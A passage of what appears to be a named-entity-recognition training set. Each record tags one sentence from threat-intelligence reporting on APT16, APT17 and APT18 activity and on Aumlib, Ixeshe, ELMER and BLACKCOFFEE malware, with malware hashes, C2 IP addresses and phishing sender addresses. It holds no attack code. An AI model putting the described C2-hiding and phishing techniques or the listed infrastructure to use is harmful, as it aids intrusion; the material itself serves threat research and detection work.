"aptner_train"}} {"text": "Naturally , our first priority is ensuring that we detect the new or altered TTPs .", "spans": {}, "info": {"id": "aptner_train_002216", "source": "aptner_train"}} {"text": "But we also attempt to figure out why the adversary changed — what broke? — so that we can predict if and when they will change again in the future .", "spans": {}, "info": {"id": "aptner_train_002217", "source": "aptner_train"}} {"text": "We observed an example of this phenomenon around May .", "spans": {}, "info": {"id": "aptner_train_002218", "source": "aptner_train"}} {"text": "The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 .", "spans": {"Malware: Aumlib": [[25, 31]]}, "info": {"id": "aptner_train_002220", "source": "aptner_train"}} {"text": "We cannot say for sure whether the attackers were responding to the scrutiny they received in the wake of the episode .", "spans": {}, "info": {"id": "aptner_train_002221", "source": "aptner_train"}} {"text": "But we do know the change was sudden .", "spans": {}, "info": {"id": "aptner_train_002222", "source": "aptner_train"}} {"text": "Akin to turning a battleship , retooling TTPs of large threat actors is formidable .", "spans": {}, "info": {"id": "aptner_train_002223", "source": "aptner_train"}} {"text": "Such a move requires recoding malware , updating infrastructure , and possibly retraining workers on new processes .", "spans": {}, "info": {"id": "aptner_train_002224", "source": "aptner_train"}} {"text": "The following sections detail the changes to Backdoor.APT.Aumlib and Backdoor.APT.Ixeshe .", "spans": {"Indicator: Backdoor.APT.Aumlib": [[45, 64]], "Indicator: Backdoor.APT.Ixeshe": [[69, 88]]}, "info": {"id": "aptner_train_002225", "source": "aptner_train"}} {"text": "Backdoor.APT.Aumlib :", "spans": {"Indicator: Backdoor.APT.Aumlib": [[0, 19]]}, "info": {"id": "aptner_train_002226", "source": "aptner_train"}} {"text": "A recently 
observed malware sample ( hash value 832f5e01be536da71d5b3f7e41938cfb ) appears to be a modified variant of Aumlib .", "spans": {"Indicator: 832f5e01be536da71d5b3f7e41938cfb": [[48, 80]], "Malware: Aumlib": [[119, 125]]}, "info": {"id": "aptner_train_002227", "source": "aptner_train"}} {"text": "The sample , which was deployed against an organization involved in shaping economic policy , was downloaded from the following URL :", "spans": {}, "info": {"id": "aptner_train_002228", "source": "aptner_train"}} {"text": "status.acmetoy.com /DD/ myScript.js or status.acmetoy.com /DD/ css.css .", "spans": {"Indicator: status.acmetoy.com": [[0, 18], [39, 57]], "Indicator: myScript.js": [[24, 35]], "Indicator: css.css": [[63, 70]]}, "info": {"id": "aptner_train_002229", "source": "aptner_train"}} {"text": "This output reveals the following changes when compared with earlier variants :", "spans": {}, "info": {"id": "aptner_train_002230", "source": "aptner_train"}} {"text": "The POST URI is changed to /bbs/ search.asp ( as mentioned , earlier Aumlib variants used a POST URI of /bbs/ info.asp . 
) The POST body is now encoded .", "spans": {"Indicator: search.asp": [[33, 43]], "Malware: Aumlib": [[69, 75]], "Indicator: info.asp": [[110, 118]]}, "info": {"id": "aptner_train_002231", "source": "aptner_train"}} {"text": "These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family .", "spans": {"Malware: Aumlib": [[114, 120]]}, "info": {"id": "aptner_train_002232", "source": "aptner_train"}} {"text": "The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 .", "spans": {"Indicator: 832f5e01be536da71d5b3f7e41938cfb": [[11, 43]], "Malware: Aumlib": [[70, 76]], "Indicator: cb3dcde34fd9ff0e19381d99b02f9692": [[99, 131]]}, "info": {"id": "aptner_train_002233", "source": "aptner_train"}} {"text": "The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents.myPicture.info and www.documents.myPicture.info and as expected generated a POST request to /bbs/ info.asp .", "spans": {"Indicator: cb3dcde34fd9ff0e19381d99b02f9692": [[11, 43]], "Indicator: documents.myPicture.info": [[57, 81]], "Indicator: www.documents.myPicture.info": [[86, 114]], "Indicator: info.asp": [[165, 173]]}, "info": {"id": "aptner_train_002234", "source": "aptner_train"}} {"text": "Backdoor.APT.Ixeshe :", "spans": {"Indicator: Backdoor.APT.Ixeshe": [[0, 19]]}, "info": {"id": "aptner_train_002235", "source": "aptner_train"}} {"text": "Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia .", "spans": {"Malware: Ixeshe": [[0, 6]]}, "info": {"id": "aptner_train_002236", "source": "aptner_train"}} {"text": "The network traffic is encoded with a custom Base64 alphabet .", "spans": {}, "info": {"id": "aptner_train_002237", "source": "aptner_train"}} {"text": "We analyzed a recent sample that appears to have targeted entities in Taiwan , a target consistent with previous Ixeshe activity .", "spans": {"Malware: Ixeshe": 
[[113, 119]]}, "info": {"id": "aptner_train_002238", "source": "aptner_train"}} {"text": "This sample ( aa873ed803ca800ce92a39d9a683c644 ) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections .", "spans": {"Indicator: aa873ed803ca800ce92a39d9a683c644": [[14, 46]], "Malware: Ixeshe": [[194, 200]]}, "info": {"id": "aptner_train_002239", "source": "aptner_train"}} {"text": "APT16 .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002240", "source": "aptner_train"}} {"text": "Between November 26, 2015, and December 1, 2015, known and suspected China based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries .", "spans": {}, "info": {"id": "aptner_train_002241", "source": "aptner_train"}} {"text": "Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability , and the local Windows privilege escalation vulnerability CVE-2015-1701 .", "spans": {"Organization: Microsoft": [[36, 45]], "System: Word": [[46, 50]], "System: EPS": [[90, 93]], "System: Windows": [[149, 156]], "Vulnerability: CVE-2015-1701": [[192, 205]]}, "info": {"id": "aptner_train_002242", "source": "aptner_train"}} {"text": "The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO , or a backdoor that we refer to as ELMER .", "spans": {"Malware: IRONHALO": [[115, 123]], "Malware: ELMER": [[160, 165]]}, "info": {"id": "aptner_train_002243", "source": "aptner_train"}} {"text": "On November 26, 2015, a suspected China based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"System: emails": [[107, 113]]}, "info": {"id": 
"aptner_train_002244", "source": "aptner_train"}} {"text": "As shown in Figure 1, the emails originated from the Yahoo ! email address mts03282000@yahoo.co.jp , and contained the subject “ Sending of New Year No .", "spans": {"System: emails": [[26, 32]], "Organization: Yahoo": [[53, 58]], "System: email": [[61, 66]], "Indicator: mts03282000@yahoo.co.jp": [[75, 98]]}, "info": {"id": "aptner_train_002245", "source": "aptner_train"}} {"text": "Foreword ” .", "spans": {}, "info": {"id": "aptner_train_002246", "source": "aptner_train"}} {"text": "Each phishing message contained the same malicious Microsoft Word attachment .", "spans": {"Organization: Microsoft": [[51, 60]], "System: Word": [[61, 65]]}, "info": {"id": "aptner_train_002247", "source": "aptner_train"}} {"text": "The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website , as both discussed national defense topics and carried the same byline .", "spans": {}, "info": {"id": "aptner_train_002248", "source": "aptner_train"}} {"text": "The lure documents also used the Japanese calendar , as indicated by the 27th year in the Heisei period .", "spans": {}, "info": {"id": "aptner_train_002249", "source": "aptner_train"}} {"text": "This demonstrates that the threat actors understand conventional Japanese date notation .", "spans": {}, "info": {"id": "aptner_train_002250", "source": "aptner_train"}} {"text": "Following the exploitation of the EPS and CVE-2015-1701 vulnerabilities , the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample .", "spans": {"System: EPS": [[34, 37]], "Vulnerability: CVE-2015-1701": [[42, 55]], "Malware: IRONHALO": [[156, 164]]}, "info": {"id": "aptner_train_002251", "source": "aptner_train"}} {"text": "The encoded payload is written to a temporary file , decoded and executed in a hidden window .", "spans": {}, "info": {"id": "aptner_train_002253", "source": "aptner_train"}} {"text": "The encoded 
and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively , where [%rand%] is a 4-byte hexadecimal number based on the current timestamp .", "spans": {"Indicator: igfxHK[%rand%].dat": [[60, 78]], "Indicator: igfxHK[%rand%].exe": [[83, 101]]}, "info": {"id": "aptner_train_002254", "source": "aptner_train"}} {"text": "IRONHALO : AcroRd32Info.exe.exe a8ccb2fc5fec1b89f778d93096f8dd65 .", "spans": {"Malware: IRONHALO": [[0, 8]], "Indicator: AcroRd32Info.exe.exe": [[11, 31]], "Indicator: a8ccb2fc5fec1b89f778d93096f8dd65": [[32, 64]]}, "info": {"id": "aptner_train_002255", "source": "aptner_train"}} {"text": "IRONHALO persists by copying itself to the current user ’s Startup folder .", "spans": {"Malware: IRONHALO": [[0, 8]], "System: Startup": [[59, 66]]}, "info": {"id": "aptner_train_002256", "source": "aptner_train"}} {"text": "This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string , as shown in Figure 2 .", "spans": {"System: User-Agent": [[86, 96]]}, "info": {"id": "aptner_train_002257", "source": "aptner_train"}} {"text": "The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads .", "spans": {}, "info": {"id": "aptner_train_002258", "source": "aptner_train"}} {"text": "On December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701 .", "spans": {"System: EPS": [[109, 112]], "Vulnerability: CVE-2015-1701": [[131, 144]]}, "info": {"id": "aptner_train_002259", "source": "aptner_train"}} {"text": "Unlike the Nov. 
26 campaign , these attacks targeted Taiwanese governmental and media and entertainment organizations .", "spans": {}, "info": {"id": "aptner_train_002260", "source": "aptner_train"}} {"text": "Moreover , the exploit dropped a different malware payload , a backdoor we refer to as ELMER .", "spans": {"Malware: ELMER": [[87, 92]]}, "info": {"id": "aptner_train_002261", "source": "aptner_train"}} {"text": "The first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1 .", "spans": {}, "info": {"id": "aptner_train_002262", "source": "aptner_train"}} {"text": "The attachment was created using the traditional Chinese character set , and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website http://shwoo.gov.taipei/buyer_flowchart.asp .", "spans": {"Organization: Taiwanese government": [[145, 165]], "Indicator: http://shwoo.gov.taipei/buyer_flowchart.asp": [[182, 225]]}, "info": {"id": "aptner_train_002263", "source": "aptner_train"}} {"text": "The second December spear phishing attack targeted Taiwan based news media organizations .", "spans": {}, "info": {"id": "aptner_train_002264", "source": "aptner_train"}} {"text": "The emails originated from the address dpptccb.dpp@msa.hinet.net , and contained the subject DPP's Contact Information Update .", "spans": {"System: emails": [[4, 10]], "Indicator: dpptccb.dpp@msa.hinet.net": [[39, 64]]}, "info": {"id": "aptner_train_002265", "source": "aptner_train"}} {"text": "Based on the email address naming convention and message subject , the threat actors may have tried to make the message appear to be a legitimate communication from the Democratic Progressive Party ( DPP ) , Taiwan ’s opposition party .", "spans": {"System: email": [[13, 18]]}, "info": {"id": "aptner_train_002266", "source": "aptner_train"}} {"text": "Unlike the previous exploit documents , this malicious attachment did not contain any visible text when opened in Microsoft Word .", 
"spans": {"Organization: Microsoft": [[114, 123]], "System: Word": [[124, 128]]}, "info": {"id": "aptner_train_002267", "source": "aptner_train"}} {"text": "The exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER .", "spans": {"Malware: ELMER": [[139, 144]]}, "info": {"id": "aptner_train_002268", "source": "aptner_train"}} {"text": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi , and is capable of performing file uploads and downloads , file execution , and process and directory listings .", "spans": {"Malware: ELMER": [[0, 5]], "System: Delphi": [[63, 69]]}, "info": {"id": "aptner_train_002269", "source": "aptner_train"}} {"text": "To retrieve commands , ELMER sends HTTP GET requests to a hard-coded C2 server , and parses the HTTP response packets received from the C2 server for an integer string corresponding to the command that needs to be executed .", "spans": {"Malware: ELMER": [[23, 28]], "System: C2": [[69, 71], [136, 138]]}, "info": {"id": "aptner_train_002270", "source": "aptner_train"}} {"text": "Table 2 lists the ELMER backdoors observed during the December campaigns .", "spans": {"Malware: ELMER backdoors": [[18, 33]]}, "info": {"id": "aptner_train_002271", "source": "aptner_train"}} {"text": "The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121.127.249.74 over port 443 .", "spans": {"Malware: ELMER": [[4, 9]], "Indicator: 6c33223db475f072119fe51a2437a542": [[18, 50]], "System: C2": [[67, 69]], "Indicator: 121.127.249.74": [[81, 95]]}, "info": {"id": "aptner_train_002272", "source": "aptner_train"}} {"text": "APT16 .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002273", "source": "aptner_train"}} {"text": "This is based on the use of the known APT16 domain rinpocheinfo.com , as well as overlaps in previously observed targeting and tactics , techniques and procedures ( TTPs ) .", 
"spans": {"Organization: APT16": [[38, 43]], "Indicator: rinpocheinfo.com": [[51, 67]]}, "info": {"id": "aptner_train_002275", "source": "aptner_train"}} {"text": "Taiwanese citizens will go to the polls on January 16 , 2016 , to choose a new President and legislators .", "spans": {}, "info": {"id": "aptner_train_002276", "source": "aptner_train"}} {"text": "According to recent opinion polls , the Democratic Progressive Party ( DPP ) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election .", "spans": {"Organization: Democratic Progressive Party": [[40, 68]], "Organization: DPP": [[71, 74]]}, "info": {"id": "aptner_train_002277", "source": "aptner_train"}} {"text": "The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland , and the party ’s victory would represent a shift away from the ruling Kuomintang ’s closer ties with the PRC .", "spans": {"Organization: PRC": [[222, 225]]}, "info": {"id": "aptner_train_002278", "source": "aptner_train"}} {"text": "Since 1949 , Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence .", "spans": {}, "info": {"id": "aptner_train_002279", "source": "aptner_train"}} {"text": "The Chinese government is therefore concerned whether a DPP victory might weaken the commercial and tourism ties between China and Taiwan , or even drive Taiwan closer to independence .", "spans": {"Organization: Chinese government": [[4, 22]], "Organization: DPP": [[56, 59]]}, "info": {"id": "aptner_train_002280", "source": "aptner_train"}} {"text": "In 2005 , the Chinese government passed an “ anti-secession ” law that signified its intention to use “ non-peaceful ” means to stymie any Taiwanese attempt to secede from China .", "spans": {"Organization: Chinese government": [[14, 32]]}, "info": {"id": "aptner_train_002281", "source": "aptner_train"}} {"text": "APT16 actors sent spear phishing emails to two Taiwanese media 
organization addresses and three webmail addresses .", "spans": {"Organization: APT16": [[0, 5]], "System: emails": [[33, 39]]}, "info": {"id": "aptner_train_002282", "source": "aptner_train"}} {"text": "The message subject read “ DPP ’s Contact Information Update ” , apparently targeting those interested in contact information for DPP members or politicians .", "spans": {"Organization: DPP": [[27, 30], [130, 133]]}, "info": {"id": "aptner_train_002283", "source": "aptner_train"}} {"text": "The Chinese government would benefit from improved insight into local media coverage of Taiwanese politics , both to better anticipate the election outcome and to gather additional intelligence on politicians , activists , and others who interact with journalists .", "spans": {"Organization: Chinese government": [[4, 22]]}, "info": {"id": "aptner_train_002284", "source": "aptner_train"}} {"text": "This tactic is not without precedent ; in 2013 , the New York Times revealed it had been the target of China based actors shortly after it reported on the alleged mass accumulation of wealth by then-Prime Minister Wen Jiabao and his family .", "spans": {"Organization: New York Times": [[53, 67]]}, "info": {"id": "aptner_train_002285", "source": "aptner_train"}} {"text": "The actors likely sought information on the newspaper ’s sources in China , who could be silenced by the government .", "spans": {}, "info": {"id": "aptner_train_002286", "source": "aptner_train"}} {"text": "Compromising these Taiwanese news organizations would also allow the actors to gain access to informants or other protected sources , who might then be targeted for further intelligence collection or even retribution .", "spans": {}, "info": {"id": "aptner_train_002287", "source": "aptner_train"}} {"text": "The webmail addresses , while unknown , were possibly the personal-use addresses of the individuals whose corporate domain emails were targeted .", "spans": {"System: emails": [[123, 129]]}, "info": {"id": 
"aptner_train_002288", "source": "aptner_train"}} {"text": "As corporate networks become more secure and users become more vigilant , personal accounts can still offer a means to bypass security systems .", "spans": {}, "info": {"id": "aptner_train_002289", "source": "aptner_train"}} {"text": "This tactic exploits users ’ reduced vigilance when reading their own personal email , even when using corporate IT equipment to do so .", "spans": {"System: email": [[79, 84]]}, "info": {"id": "aptner_train_002290", "source": "aptner_train"}} {"text": "One of the media organizations involved in this latest activity was targeted in June 2015 , while its Hong Kong branch was similarly targeted in August 2015 .", "spans": {}, "info": {"id": "aptner_train_002293", "source": "aptner_train"}} {"text": "APT16 actors were likely also responsible for the June 2015 activity .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002294", "source": "aptner_train"}} {"text": "They sent spear phishing messages with the subject “ 2015 Taiwan Security and Cultural Forum Invitation Form ” , and used a different tool – a tool that we refer to as DOORJAMB – in their attempt to compromise the organization .", "spans": {"Malware: DOORJAMB": [[168, 176]]}, "info": {"id": "aptner_train_002295", "source": "aptner_train"}} {"text": "A different group , known as admin@338 , used LOWBALL malware during its Hong Kong activity .", "spans": {"Indicator: admin@338": [[29, 38]], "Malware: LOWBALL": [[46, 53]]}, "info": {"id": "aptner_train_002296", "source": "aptner_train"}} {"text": "Despite the differing sponsorship , penetration of Hong Kong and Taiwan based media organizations continues to be a priority for China based threat groups .", "spans": {}, "info": {"id": "aptner_train_002297", "source": "aptner_train"}} {"text": "The difference in sponsorship could be the result of tasking systems that allocate targeting responsibility to different groups based on their targets ’ 
geographic location .", "spans": {}, "info": {"id": "aptner_train_002298", "source": "aptner_train"}} {"text": "In other words , while media organizations are important targets , it is possible that two separate groups are responsible for Hong Kong and Taiwan , respectively .", "spans": {}, "info": {"id": "aptner_train_002299", "source": "aptner_train"}} {"text": "IRONHALO : CVE-2015-1701 .", "spans": {"Malware: IRONHALO": [[0, 8]], "Vulnerability: CVE-2015-1701": [[11, 24]]}, "info": {"id": "aptner_train_002301", "source": "aptner_train"}} {"text": "ELMER : CVE-2015-1701 .", "spans": {"Malware: ELMER": [[0, 5]], "Vulnerability: CVE-2015-1701": [[8, 21]]}, "info": {"id": "aptner_train_002302", "source": "aptner_train"}} {"text": "These clusters of activity raise interesting questions about the use of an identical silently-patched vulnerability , possibly by multiple threat groups .", "spans": {}, "info": {"id": "aptner_train_002303", "source": "aptner_train"}} {"text": "Both Japan and Taiwan are important intelligence collection targets for China , particularly because of recent changes to Japan ’s pacifist constitution and the upcoming Taiwanese election .", "spans": {}, "info": {"id": "aptner_train_002304", "source": "aptner_train"}} {"text": "Based on our visibility and available data , we only attribute one campaign to the Chinese APT group APT16 .", "spans": {"Organization: APT16": [[101, 106]]}, "info": {"id": "aptner_train_002305", "source": "aptner_train"}} {"text": "APT17 .", "spans": {"Organization: APT17": [[0, 5]]}, "info": {"id": "aptner_train_002306", "source": "aptner_train"}} {"text": "FireEye Threat Intelligence and the Microsoft Threat Intelligence Center investigated a command-and-control ( C2 ) obfuscation tactic used on Microsoft ’s TechNet , a web portal for IT professionals .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: Microsoft": [[36, 45], [142, 151]], "System: command-and-control": [[88, 107]], "System: C2": [[110, 112]], 
"System: TechNet": [[155, 162]]}, "info": {"id": "aptner_train_002307", "source": "aptner_train"}} {"text": "TechNet ’s security was in no way compromised by this tactic , which is likely possible on other message boards and forums .", "spans": {"System: TechNet": [[0, 7]]}, "info": {"id": "aptner_train_002308", "source": "aptner_train"}} {"text": "FireEye Threat Intelligence assesses that APT17 , a China based threat group , was behind the attempt .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: APT17": [[42, 47]]}, "info": {"id": "aptner_train_002309", "source": "aptner_train"}} {"text": "Other groups have used legitimate websites to host C2 IP address in the past .", "spans": {"System: C2": [[51, 53]]}, "info": {"id": "aptner_train_002310", "source": "aptner_train"}} {"text": "APT17 was embedding the encoded C2 IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a “ dead drop resolver. 
” Encoding the IP address makes it more difficult to identify the true C2 address for network security professionals .", "spans": {"Organization: APT17": [[0, 5]], "System: C2": [[32, 34], [293, 295]], "Malware: BLACKCOFFEE": [[54, 65]], "Organization: Microsoft": [[88, 97]], "System: TechNet": [[98, 105]]}, "info": {"id": "aptner_train_002311", "source": "aptner_train"}} {"text": "Few security companies have publicly discussed this tactic .", "spans": {}, "info": {"id": "aptner_train_002312", "source": "aptner_train"}} {"text": "After discovering the BLACKCOFFEE activity , the FireEye-Microsoft team encoded a sinkhole IP address into the profile pages and forum threads and locked the accounts to prevent the threat actors from making any changes .", "spans": {"Malware: BLACKCOFFEE": [[22, 33]], "Organization: FireEye-Microsoft": [[49, 66]]}, "info": {"id": "aptner_train_002313", "source": "aptner_train"}} {"text": "This collaborative approach allowed the team to observe the malware and its victims .", "spans": {}, "info": {"id": "aptner_train_002314", "source": "aptner_train"}} {"text": "Though the security community has not yet broadly discussed this technique , FireEye has observed other threat groups adopting these measures and expect this trend to continue on other community sites .", "spans": {"Organization: FireEye": [[77, 84]]}, "info": {"id": "aptner_train_002315", "source": "aptner_train"}} {"text": "Today , FireEye released Indicators of Compromise ( IOCs ) for BLACKCOFFEE and Microsoft released signatures for its anti-malware products .", "spans": {"Organization: FireEye": [[8, 15]], "Malware: BLACKCOFFEE": [[63, 74]], "Organization: Microsoft": [[79, 88]]}, "info": {"id": "aptner_train_002316", "source": "aptner_train"}} {"text": "APT17 , also known as DeputyDog , is a Chinabased threat group that FireEye Intelligence has observed conducting network intrusions against U.S. 
government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"Organization: APT17": [[0, 5]], "Organization: DeputyDog": [[22, 31]], "Organization: FireEye": [[68, 75]]}, "info": {"id": "aptner_train_002317", "source": "aptner_train"}} {"text": "BLACKCOFFEE ’s functionality includes uploading and downloading files ; creating a reverse shell ; enumerating files and processes ; renaming , moving , and deleting files ; terminating processes ; and expanding its functionality by adding new backdoor commands .", "spans": {"Malware: BLACKCOFFEE": [[0, 11]]}, "info": {"id": "aptner_train_002318", "source": "aptner_train"}} {"text": "FireEye has monitored APT17 ’s use of BLACKCOFFEE variants since 2013 to masquerade malicious communication as normal web traffic by disguising the C2 communication as queries to web search engines .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: APT17": [[22, 27]], "Malware: BLACKCOFFEE": [[38, 49]], "System: C2": [[148, 150]]}, "info": {"id": "aptner_train_002319", "source": "aptner_train"}} {"text": "The use of BLACKCOFFEE demonstrates threat actors ’ evolving use of public websites to hide in plain sight .", "spans": {"Malware: BLACKCOFFEE": [[11, 22]]}, "info": {"id": "aptner_train_002320", "source": "aptner_train"}} {"text": "In the past , threat actors would modify easily compromised websites to host C2 commands and configuration , as observed in the China based APT1 ’s WEBC2 suite of backdoors .", "spans": {"System: C2": [[77, 79]], "Organization: APT1": [[140, 144]], "Malware: WEBC2": [[148, 153]]}, "info": {"id": "aptner_train_002321", "source": "aptner_train"}} {"text": "Now , threat actors are using well-known websites—that they do not need to compromise to host C2 IP addresses .", "spans": {"System: C2": [[94, 96]]}, "info": {"id": "aptner_train_002322", "source": "aptner_train"}} {"text": "They simply use the website for 
legitimate purposes , such as posting forum threads or creating profile pages .", "spans": {}, "info": {"id": "aptner_train_002323", "source": "aptner_train"}} {"text": "APT17 went further to obfuscate their C2 IP address and employed a multi-layered approach for the malware to finally beacon the true C2 IP .", "spans": {"Organization: APT17": [[0, 5]], "System: C2": [[38, 40], [133, 135]]}, "info": {"id": "aptner_train_002324", "source": "aptner_train"}} {"text": "They used legitimate infrastructure—the ability to post or create comments on forums and profile pages—to embed a string that the malware would decode to find and communicate with the true C2 IP address .", "spans": {"System: C2": [[189, 191]]}, "info": {"id": "aptner_train_002325", "source": "aptner_train"}} {"text": "This additional obfuscation puts yet another layer between APT17 and the security professionals attempting to chase them down .", "spans": {"Organization: APT17": [[59, 64]]}, "info": {"id": "aptner_train_002326", "source": "aptner_train"}} {"text": "This BLACKCOFFEE variant contains one or more URLs that link to the biography sections of attacker-created profiles as well as forum threads that contain comments from those same profiles .", "spans": {"Malware: BLACKCOFFEE": [[5, 16]]}, "info": {"id": "aptner_train_002327", "source": "aptner_train"}} {"text": "A URL is randomly selected and the malware searches at that location for an encoded IP address located between two tags , “ @MICR0S0FT ” and “ C0RP0RATI0N ” .", "spans": {}, "info": {"id": "aptner_train_002328", "source": "aptner_train"}} {"text": "The malware then communicates directly with the retrieved and decoded IP address to receive commands and send stolen information .", "spans": {}, "info": {"id": "aptner_train_002329", "source": "aptner_train"}} {"text": "If the C2 server is discovered or shut down , the threat actors can update the encoded IP address on TechNet to maintain control of the victims ’ machines .", "spans": 
{"System: C2": [[7, 9]], "System: TechNet": [[101, 108]]}, "info": {"id": "aptner_train_002330", "source": "aptner_train"}} {"text": "BLACKCOFFEE supports an initial set of fifteen commands , including creating a reverse shell , uploading and downloading files , and enumerating files and processes .", "spans": {"Malware: BLACKCOFFEE": [[0, 11]]}, "info": {"id": "aptner_train_002331", "source": "aptner_train"}} {"text": "The attackers can also extend BLACKCOFFEE ’s functionality through additional commands sent as shellcode .", "spans": {"Malware: BLACKCOFFEE": [[30, 41]]}, "info": {"id": "aptner_train_002332", "source": "aptner_train"}} {"text": "APT17 : de56eb5046e518e266e67585afa34612 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: de56eb5046e518e266e67585afa34612": [[8, 40]]}, "info": {"id": "aptner_train_002333", "source": "aptner_train"}} {"text": "APT17 : 195ade342a6a4ea0a58cfbfb43dc64cb .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 195ade342a6a4ea0a58cfbfb43dc64cb": [[8, 40]]}, "info": {"id": "aptner_train_002334", "source": "aptner_train"}} {"text": "APT17 : 4c21336dad66ebed2f7ee45d41e6cada .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 4c21336dad66ebed2f7ee45d41e6cada": [[8, 40]]}, "info": {"id": "aptner_train_002335", "source": "aptner_train"}} {"text": "APT17 : 0370002227619c205402c48bde4332f6 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 0370002227619c205402c48bde4332f6": [[8, 40]]}, "info": {"id": "aptner_train_002336", "source": "aptner_train"}} {"text": "APT17 : ac169b7d4708c6fa7fee9be5f7576414 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: ac169b7d4708c6fa7fee9be5f7576414": [[8, 40]]}, "info": {"id": "aptner_train_002337", "source": "aptner_train"}} {"text": "APT17 : 130.184.156.62 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 130.184.156.62": [[8, 22]]}, "info": {"id": "aptner_train_002338", "source": "aptner_train"}} {"text": "APT17 : 69.80.72.165 .", "spans": 
{"Organization: APT17": [[0, 5]], "Indicator: 69.80.72.165": [[8, 20]]}, "info": {"id": "aptner_train_002339", "source": "aptner_train"}} {"text": "APT17 : 110.45.151.43 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 110.45.151.43": [[8, 21]]}, "info": {"id": "aptner_train_002340", "source": "aptner_train"}} {"text": "APT17 : 121.101.73.231 .", "spans": {"Organization: APT17": [[0, 5]], "Indicator: 121.101.73.231": [[8, 22]]}, "info": {"id": "aptner_train_002341", "source": "aptner_train"}} {"text": "APT18 .", "spans": {"Organization: APT18": [[0, 5]]}, "info": {"id": "aptner_train_002342", "source": "aptner_train"}} {"text": "Dell SecureWorks Counter Threat Unit ( CTU ) analysts were recently engaged with a client thought to have been compromised by a threat group CTU researchers have named Threat Group-0416 ( TG-0416 ) .", "spans": {"Organization: Dell SecureWorks Counter Threat Unit": [[0, 36]], "Organization: CTU": [[39, 42], [141, 144]], "Organization: Threat Group-0416": [[168, 185]], "Organization: TG-0416": [[188, 195]]}, "info": {"id": "aptner_train_002343", "source": "aptner_train"}} {"text": "Various artifacts from the initial phases of the incident provided strong indications of the existence of this particular threat group within the client's infrastructure .", "spans": {}, "info": {"id": "aptner_train_002344", "source": "aptner_train"}} {"text": "The threat actors achieved an initial foothold into the infrastructure via phishing email that convinced victims to install the Xyligan remote access Trojan ( RAT ) on a system .", "spans": {"System: phishing email": [[75, 89]], "Malware: Xyligan": [[128, 135]], "Malware: Trojan": [[150, 156]]}, "info": {"id": "aptner_train_002346", "source": "aptner_train"}} {"text": "The threat actors then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system .", "spans": {"Malware: hcdLoader": [[37, 46]], "System: Windows": [[73, 80]]}, 
"info": {"id": "aptner_train_002347", "source": "aptner_train"}} {"text": "Using host-based digital forensic analysis , CTU analysts observed the intruders using the native ‘ at.exe ’ Windows task scheduler tool to move laterally within the infrastructure .", "spans": {"Organization: CTU": [[45, 48]], "Indicator: at.exe": [[100, 106]], "System: Windows": [[109, 116]]}, "info": {"id": "aptner_train_002348", "source": "aptner_train"}} {"text": "Many threat groups use lateral movement techniques , but this engagement allowed CTU analysts to not only further validate indicators of lateral movement , but also to look a bit closer at those indicators and expand the cluster of indicators surrounding the use of at.exe for lateral movement within the infrastructure .", "spans": {"Organization: CTU": [[81, 84]], "Indicator: at.exe": [[266, 272]]}, "info": {"id": "aptner_train_002349", "source": "aptner_train"}} {"text": "Threat actors accessed the source host via the hcdLoader RAT .", "spans": {"Malware: hcdLoader": [[47, 56]]}, "info": {"id": "aptner_train_002350", "source": "aptner_train"}} {"text": "The sole indicator on the source host that at.exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf ) that was created when the tool was executed .", "spans": {"Indicator: at.exe": [[43, 49]], "Indicator: C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf": [[98, 136]]}, "info": {"id": "aptner_train_002351", "source": "aptner_train"}} {"text": "Beyond the file system metadata for the Prefetch file ( creation and last modification times ) and the last execution time within the file metadata , CTU analysts did not observe any indicators of value on the source host .", "spans": {"System: Prefetch": [[40, 48]], "Organization: CTU": [[150, 153]]}, "info": {"id": "aptner_train_002352", "source": "aptner_train"}} {"text": "Two files are created for the task at approximately the same time : 